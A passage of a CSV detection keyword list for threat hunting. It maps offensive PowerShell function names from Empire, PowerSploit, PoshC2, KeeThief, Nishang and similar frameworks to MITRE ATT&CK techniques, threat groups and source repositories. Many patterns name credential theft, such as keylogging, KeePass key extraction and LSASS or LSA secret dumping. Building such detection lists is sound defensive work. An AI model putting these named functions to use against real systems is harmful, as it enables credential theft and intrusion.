T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-KeePassDatabaseKey*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*Get-KeePassINIFields*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-KeePassXMLFields*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-KeystrokeData*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-Keystrokes *,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-Keystrokes*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-keystrokes*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-Keystrokes*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-Killdate*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-killdate*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-KIWI_KERBEROS_LOGON_SESSION*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,0,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*Get-LastLoggedon -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-LastLoggedOn*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*getLocalAdm*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Get-LoggedOnLocal -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-LoggedonLocal -ComputerName *,greyware_tool_keyword,powershell,PowerView get Locally logged users on a machine,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-LsaRunAsPPLStatus*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-LSASecret*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Get-ModifiableRegistryAutoRun*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ModifiableRegistryAutoRun*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-ModifiableScheduledTaskFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ModifiableScheduledTaskFile*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-ModifiableService*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-MpComputerStatus*,greyware_tool_keyword,powershell,Gets the status of antimalware software on the computer.,T1063,TA0005 - TA0007,N/A,N/A,Discovery,https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Get-NetComputer -Unconstrainuser*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetDomainController*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetDomainTrust*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*get-netfileserver -domain *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-NetFileServer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetFileServer*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetForestCatalog*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetForestDomain*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetForestDomain*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetForestTrust*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - 